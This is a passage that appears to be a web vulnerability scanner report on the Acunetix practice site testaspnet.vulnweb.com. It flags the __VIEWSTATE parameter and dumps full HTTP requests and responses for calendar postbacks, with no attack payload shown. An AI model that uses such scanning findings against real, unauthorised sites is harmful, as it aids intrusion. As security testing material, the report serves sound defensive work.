style="color:Black" title="April 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8503')" style="color:Black" title="April 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8504')" style="color:Black" title="April 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8505')" style="color:Black" title="April 15">15</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8506')" style="color:Black" title="April 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8507')" style="color:Black" title="April 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8508')" style="color:Black" title="April 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8509')" style="color:Black" title="April 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8510')" style="color:Black" title="April 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8511')" style="color:Black" title="April 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8512')" style="color:Black" title="April 22">22</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8513')" style="color:Black" title="April 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8514')" style="color:Black" title="April 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8515')" style="color:Black" title="April 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8516')" style="color:Black" title="April 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8517')" style="color:Black" title="April 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8518')" style="color:Black" title="April 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8519')" style="color:Black" title="April 29">29</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8520')" style="color:Black" title="April 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8521')" style="color:Black" title="May 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8522')" style="color:Black" title="May 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8523')" style="color:Black" title="May 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8524')" style="color:Black" title="May 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8525')" style="color:Black" title="May 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8526')" style="color:Black" title="May 06">6</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1129 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,129 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8495&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCAZwlEMtsIHgJTRBYBBgCADrNoNdsIZGRkGLaF3CgB9XQU9D62iqeUYC8EMFo%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKWn6qrBwLTp%2BrACAK1zpjCCwK%2Fk8eMBAK%2Fk8eMBAK%2Fk%2FujDQK%2Fk%2FujDQK%2Fk%2B%2FGBgK%2Fk%2B%2FGBgK%2Fk8OvAwK%2Fk8OvAwK%2Fk%2FfCDAK%2Fk%2FfCDAKQusHrDwKQusHrDwKQuvWOBwKQuvWOBwKQuuklApC66SUCkLqd%2BAkCkLqd%2BAkCkLqxnwECkLqxnwECkLqlsgoCkLqlsgoCkLrZ1gMCkLrZ1gMCkLrN7QwCkLrN7QwCkLqh1QkCkLqh1QkCkLrV6QICkLrV6QIC19mUngcC19mUngcC19mINQLX2Yg1AtfZvMgJAtfZvMgJAtfZ0OwCAtfZ0OwCAtfZxIMKAtfZxIMKAtfZ%2BKYDAtfZ%2BKYDAtfZ7P0MAtfZ7P0MAtfZgJAEAtfZgJAEAtfZ9PkCAtfZ9PkCAtfZ6JwKAtfZ6JwKAqjg%2BoUNAqjg%2BoUNAqjg7tgGAqjg7tgGAqjggv8PAqjggv8PAqjgtpIHAqjgtpIHAqjgqikCqOCqKQKo4N7NCQKo4N7NCQKo4PLgAgKo4PLgAgKo4OaHCgKo4OaHCgKo4NrsCAKo4NrsCAKo4M4DAqjgzgMCjffYqAMCjffYqAMCjffMzwwCjffMzwwCjffg4gUCjffg4gUCjfeUuQ0CjfeUuQ0CjfeI3AYCjfeI3AYCjfe88w8Cjfe88w8CjffQlwcCjffQlwd9QuDi9J6e8trqIsIBjnQKl%2FpLjw%3D%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:16:25 GMT Content-Length: 12481
Response Body - size: 12,481 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCAZwlEMtsIHgJTRBYBBgCADrNoNdsIZGRkGLaF3CgB9XQU9D62iqeUYC8EMFo=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKWn6qrBwLTp+rACAK1zpjCCwK/k8eMBAK/k8eMBAK/k/ujDQK/k/ujDQK/k+/GBgK/k+/GBgK/k8OvAwK/k8OvAwK/k/fCDAK/k/fCDAKQusHrDwKQusHrDwKQuvWOBwKQuvWOBwKQuuklApC66SUCkLqd+AkCkLqd+AkCkLqxnwECkLqxnwECkLqlsgoCkLqlsgoCkLrZ1gMCkLrZ1gMCkLrN7QwCkLrN7QwCkLqh1QkCkLqh1QkCkLrV6QICkLrV6QIC19mUngcC19mUngcC19mINQLX2Yg1AtfZvMgJAtfZvMgJAtfZ0OwCAtfZ0OwCAtfZxIMKAtfZxIMKAtfZ+KYDAtfZ+KYDAtfZ7P0MAtfZ7P0MAtfZgJAEAtfZgJAEAtfZ9PkCAtfZ9PkCAtfZ6JwKAtfZ6JwKAqjg+oUNAqjg+oUNAqjg7tgGAqjg7tgGAqjggv8PAqjggv8PAqjgtpIHAqjgtpIHAqjgqikCqOCqKQKo4N7NCQKo4N7NCQKo4PLgAgKo4PLgAgKo4OaHCgKo4OaHCgKo4NrsCAKo4NrsCAKo4M4DAqjgzgMCjffYqAMCjffYqAMCjffMzwwCjffMzwwCjffg4gUCjffg4gUCjfeUuQ0CjfeUuQ0CjfeI3AYCjfeI3AYCjfe88w8Cjfe88w8CjffQlwcCjffQlwd9QuDi9J6e8trqIsIBjnQKl/pLjw==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8460')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">April 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8521')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8485')" style="color:Black" title="March 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8486')" style="color:Black" title="March 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8487')" style="color:Black" title="March 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8488')" style="color:Black" title="March 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8489')" style="color:Black" title="March 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8490')" style="color:Black" title="March 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8491')" style="color:Black" title="April 01">1</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8492')" style="color:Black" title="April 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8493')" style="color:Black" title="April 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8494')" style="color:Black" title="April 04">4</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8495')" style="color:White" title="April 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8496')" style="color:Black" title="April 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8497')" style="color:Black" title="April 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8498')" style="color:Black" title="April 08">8</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8499')" style="color:Black" title="April 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8500')" style="color:Black" title="April 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8501')" style="color:Black" title="April 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8502')" style="color:Black" title="April 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8503')" style="color:Black" title="April 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8504')" style="color:Black" title="April 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8505')" style="color:Black" title="April 15">15</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8506')" style="color:Black" title="April 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8507')" style="color:Black" title="April 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8508')" style="color:Black" title="April 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8509')" style="color:Black" title="April 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8510')" style="color:Black" title="April 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8511')" style="color:Black" title="April 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8512')" style="color:Black" title="April 22">22</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8513')" style="color:Black" title="April 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8514')" style="color:Black" title="April 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8515')" style="color:Black" title="April 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8516')" style="color:Black" title="April 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8517')" style="color:Black" title="April 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8518')" style="color:Black" title="April 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8519')" style="color:Black" title="April 29">29</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8520')" style="color:Black" title="April 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8521')" style="color:Black" title="May 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8522')" style="color:Black" title="May 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8523')" style="color:Black" title="May 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8524')" style="color:Black" title="May 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8525')" style="color:Black" title="May 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8526')" style="color:Black" title="May 06">6</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1131 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,131 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8499&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCAZwlEMtsIHgJTRBYBBgCAtVyNONsIZGRkUs7aw5DmrqckyqfcbWz7JIl5U%2Bs%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKJ9r%2BlCgLTp%2BrACAK1zpjCCwK%2Fk8eMBAK%2Fk8eMBAK%2Fk%2FujDQK%2Fk%2FujDQK%2Fk%2B%2FGBgK%2Fk%2B%2FGBgK%2Fk8OvAwK%2Fk8OvAwK%2Fk%2FfCDAK%2Fk%2FfCDAKQusHrDwKQusHrDwKQuvWOBwKQuvWOBwKQuuklApC66SUCkLqd%2BAkCkLqd%2BAkCkLqxnwECkLqxnwECkLqlsgoCkLqlsgoCkLrZ1gMCkLrZ1gMCkLrN7QwCkLrN7QwCkLqh1QkCkLqh1QkCkLrV6QICkLrV6QIC19mUngcC19mUngcC19mINQLX2Yg1AtfZvMgJAtfZvMgJAtfZ0OwCAtfZ0OwCAtfZxIMKAtfZxIMKAtfZ%2BKYDAtfZ%2BKYDAtfZ7P0MAtfZ7P0MAtfZgJAEAtfZgJAEAtfZ9PkCAtfZ9PkCAtfZ6JwKAtfZ6JwKAqjg%2BoUNAqjg%2BoUNAqjg7tgGAqjg7tgGAqjggv8PAqjggv8PAqjgtpIHAqjgtpIHAqjgqikCqOCqKQKo4N7NCQKo4N7NCQKo4PLgAgKo4PLgAgKo4OaHCgKo4OaHCgKo4NrsCAKo4NrsCAKo4M4DAqjgzgMCjffYqAMCjffYqAMCjffMzwwCjffMzwwCjffg4gUCjffg4gUCjfeUuQ0CjfeUuQ0CjfeI3AYCjfeI3AYCjfe88w8Cjfe88w8CjffQlwcCjffQlwdVc8wJDPWDXcFNcyDjO64O456ewQ%3D%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:28:06 GMT Content-Length: 12481
Response Body - size: 12,481 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCAZwlEMtsIHgJTRBYBBgCAtVyNONsIZGRkUs7aw5DmrqckyqfcbWz7JIl5U+s=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKJ9r+lCgLTp+rACAK1zpjCCwK/k8eMBAK/k8eMBAK/k/ujDQK/k/ujDQK/k+/GBgK/k+/GBgK/k8OvAwK/k8OvAwK/k/fCDAK/k/fCDAKQusHrDwKQusHrDwKQuvWOBwKQuvWOBwKQuuklApC66SUCkLqd+AkCkLqd+AkCkLqxnwECkLqxnwECkLqlsgoCkLqlsgoCkLrZ1gMCkLrZ1gMCkLrN7QwCkLrN7QwCkLqh1QkCkLqh1QkCkLrV6QICkLrV6QIC19mUngcC19mUngcC19mINQLX2Yg1AtfZvMgJAtfZvMgJAtfZ0OwCAtfZ0OwCAtfZxIMKAtfZxIMKAtfZ+KYDAtfZ+KYDAtfZ7P0MAtfZ7P0MAtfZgJAEAtfZgJAEAtfZ9PkCAtfZ9PkCAtfZ6JwKAtfZ6JwKAqjg+oUNAqjg+oUNAqjg7tgGAqjg7tgGAqjggv8PAqjggv8PAqjgtpIHAqjgtpIHAqjgqikCqOCqKQKo4N7NCQKo4N7NCQKo4PLgAgKo4PLgAgKo4OaHCgKo4OaHCgKo4NrsCAKo4NrsCAKo4M4DAqjgzgMCjffYqAMCjffYqAMCjffMzwwCjffMzwwCjffg4gUCjffg4gUCjfeUuQ0CjfeUuQ0CjfeI3AYCjfeI3AYCjfe88w8Cjfe88w8CjffQlwcCjffQlwdVc8wJDPWDXcFNcyDjO64O456ewQ==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8460')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">April 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8521')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8485')" style="color:Black" title="March 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8486')" style="color:Black" title="March 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8487')" style="color:Black" title="March 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8488')" style="color:Black" title="March 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8489')" style="color:Black" title="March 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8490')" style="color:Black" title="March 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8491')" style="color:Black" title="April 01">1</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8492')" style="color:Black" title="April 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8493')" style="color:Black" title="April 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8494')" style="color:Black" title="April 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8495')" style="color:Black" title="April 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8496')" style="color:Black" title="April 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8497')" style="color:Black" title="April 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8498')" style="color:Black" title="April 08">8</a></td></tr><tr><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8499')" style="color:White" title="April 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8500')" style="color:Black" title="April 10">10</a></td><td align="center" style="width:14%;"><a 